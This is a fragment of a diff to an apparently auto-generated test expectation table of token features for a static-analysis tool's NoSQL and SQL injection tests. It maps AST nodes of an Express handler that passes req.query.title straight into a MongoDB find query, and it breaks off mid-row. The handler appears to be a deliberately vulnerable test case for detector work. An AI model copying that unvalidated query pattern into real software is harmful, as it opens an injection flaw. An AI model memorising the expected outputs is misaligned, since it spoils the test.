| query | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | @@ -1661,6 +8887,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:43:16:43:20 | query | enclosingFunctionName | app.get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:43:16:43:20 | query | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:43:16:43:20 | query | receiverName | doc | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:1:47:3 | app | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:1:47:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:1:47:3 | app | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:1:47:8 | app.post | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:1:47:8 | app.post | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:1:47:8 | app.post | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:1:56:2 | app.pos ... });\\n}) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:1:56:2 | app.pos ... });\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:1:56:2 | app.pos ... });\\n}) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:1:56:2 | exceptional return of app.pos ... });\\n}) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:1:56:2 | exceptional return of app.pos ... });\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:1:56:2 | exceptional return of app.pos ... });\\n}) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:5:47:8 | post | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:5:47:8 | post | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:5:47:8 | post | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:10:47:26 | '/documents/find' | CalleeFlexibleAccessPath | app.post | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:10:47:26 | '/documents/find' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:10:47:26 | '/documents/find' | calleeImports | express | @@ -1668,6 +8909,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:10:47:26 | '/documents/find' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:10:47:26 | '/documents/find' | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:10:47:26 | '/documents/find' | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:29:47:28 | MongoClient | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:29:47:28 | MongoClient | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:29:47:28 | MongoClient | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:29:47:28 | MongoClient | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:29:47:28 | MongoClient | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:29:47:29 | query | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:29:47:29 | query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:29:47:29 | query | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:29:47:29 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:29:47:29 | query | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:29:56:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:29:56:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:29:56:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:29:56:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:29:56:1 | 'arguments' object of anonymous function | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:29:56:1 | (req, r ... });\\n} | CalleeFlexibleAccessPath | app.post | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:29:56:1 | (req, r ... });\\n} | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:29:56:1 | (req, r ... });\\n} | calleeImports | express | @@ -1675,11 +8931,125 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:29:56:1 | (req, r ... });\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:29:56:1 | (req, r ... });\\n} | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:29:56:1 | (req, r ... });\\n} | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:29:56:1 | exceptional return of anonymous function | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:29:56:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:29:56:1 | exceptional return of anonymous function | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:29:56:1 | exceptional return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:29:56:1 | exceptional return of anonymous function | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:29:56:1 | return of anonymous function | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:29:56:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:29:56:1 | return of anonymous function | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:29:56:1 | return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:29:56:1 | return of anonymous function | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:30:47:32 | req | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:30:47:32 | req | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:30:47:32 | req | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:30:47:32 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:30:47:32 | req | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:30:47:32 | req | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:30:47:32 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:30:47:32 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:30:47:32 | req | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:30:47:32 | req | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:35:47:37 | res | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:35:47:37 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:35:47:37 | res | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:35:47:37 | res | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:47:35:47:37 | res | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:48:11:48:15 | query | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:48:11:48:15 | query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:48:11:48:15 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:48:11:48:15 | query | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:48:11:48:15 | query | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:48:11:48:15 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:48:11:48:15 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:48:11:48:15 | query | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:48:11:48:20 | query | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:48:11:48:20 | query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:48:11:48:20 | query | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:48:11:48:20 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:48:11:48:20 | query | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:48:11:48:20 | query = {} | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:48:11:48:20 | query = {} | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:48:11:48:20 | query = {} | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:48:11:48:20 | query = {} | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:48:11:48:20 | query = {} | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:48:19:48:20 | {} | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:48:19:48:20 | {} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:48:19:48:20 | {} | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:48:19:48:20 | {} | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:48:19:48:20 | {} | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:49:5:49:9 | query | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:49:5:49:9 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:49:5:49:9 | query | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:49:5:49:9 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:49:5:49:9 | query | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:49:5:49:15 | query.title | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:49:5:49:15 | query.title | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:49:5:49:15 | query.title | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:49:5:49:15 | query.title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:49:5:49:15 | query.title | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:49:5:49:33 | query.t ... y.title | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:49:5:49:33 | query.t ... y.title | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:49:5:49:33 | query.t ... y.title | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:49:5:49:33 | query.t ... y.title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:49:5:49:33 | query.t ... y.title | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:49:11:49:15 | title | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:49:11:49:15 | title | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:49:11:49:15 | title | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:49:11:49:15 | title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:49:11:49:15 | title | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:49:19:49:21 | req | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:49:19:49:21 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:49:19:49:21 | req | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:49:19:49:21 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:49:19:49:21 | req | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:49:19:49:27 | req.query | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:49:19:49:27 | req.query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:49:19:49:27 | req.query | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:49:19:49:27 | req.query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:49:19:49:27 | req.query | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:49:19:49:33 | req.query.title | assignedToPropName | title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:49:19:49:33 | req.query.title | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:49:19:49:33 | req.query.title | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:49:19:49:33 | req.query.title | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:49:19:49:33 | req.query.title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:49:19:49:33 | req.query.title | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:49:23:49:27 | query | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:49:23:49:27 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:49:23:49:27 | query | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:49:23:49:27 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:49:23:49:27 | query | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:49:29:49:33 | title | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:49:29:49:33 | title | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:49:29:49:33 | title | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:49:29:49:33 | title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:49:29:49:33 | title | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:5:50:15 | MongoClient | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:5:50:15 | MongoClient | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:5:50:15 | MongoClient | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:5:50:15 | MongoClient | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:5:50:15 | MongoClient | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:5:50:23 | MongoClient.connect | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:5:50:23 | MongoClient.connect | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:5:50:23 | MongoClient.connect | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:5:50:23 | MongoClient.connect | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:5:50:23 | MongoClient.connect | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:5:55:6 | MongoCl ... \\n }) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:5:55:6 | MongoCl ... \\n }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:5:55:6 | MongoCl ... \\n }) | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:5:55:6 | MongoCl ... \\n }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:5:55:6 | MongoCl ... \\n }) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:5:55:6 | exceptional return of MongoCl ... \\n }) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:5:55:6 | exceptional return of MongoCl ... \\n }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:5:55:6 | exceptional return of MongoCl ... \\n }) | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:5:55:6 | exceptional return of MongoCl ... \\n }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:5:55:6 | exceptional return of MongoCl ... \\n }) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:17:50:23 | connect | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:17:50:23 | connect | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:17:50:23 | connect | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:17:50:23 | connect | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:17:50:23 | connect | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:25:50:56 | 'mongod ... 7/test' | CalleeFlexibleAccessPath | MongoClient.connect | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:25:50:56 | 'mongod ... 7/test' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:25:50:56 | 'mongod ... 7/test' | calleeImports | mongodb | @@ -1689,6 +9059,16 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:25:50:56 | 'mongod ... 7/test' | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:25:50:56 | 'mongod ... 7/test' | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:25:50:56 | 'mongod ... 7/test' | receiverName | MongoClient | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:59:50:58 | query | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:59:50:58 | query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:59:50:58 | query | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:59:50:58 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:59:50:58 | query | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:59:55:5 | 'arguments' object of anonymous function | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:59:55:5 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:59:55:5 | 'arguments' object of anonymous function | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:59:55:5 | 'arguments' object of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:59:55:5 | 'arguments' object of anonymous function | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:59:55:5 | (err, d ... ;\\n } | CalleeFlexibleAccessPath | MongoClient.connect | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:59:55:5 | (err, d ... ;\\n } | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:59:55:5 | (err, d ... ;\\n } | calleeImports | mongodb | @@ -1698,6 +9078,71 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:59:55:5 | (err, d ... ;\\n } | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:59:55:5 | (err, d ... ;\\n } | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:59:55:5 | (err, d ... ;\\n } | receiverName | MongoClient | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:59:55:5 | exceptional return of anonymous function | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:59:55:5 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:59:55:5 | exceptional return of anonymous function | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:59:55:5 | exceptional return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:59:55:5 | exceptional return of anonymous function | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:59:55:5 | return of anonymous function | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:59:55:5 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:59:55:5 | return of anonymous function | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:59:55:5 | return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:59:55:5 | return of anonymous function | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:60:50:62 | err | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:60:50:62 | err | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:60:50:62 | err | enclosingFunctionBody | req res query query title req query title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:50:60:50:62 | err | enclosingFunctionName | app.post#functionalargument | +| 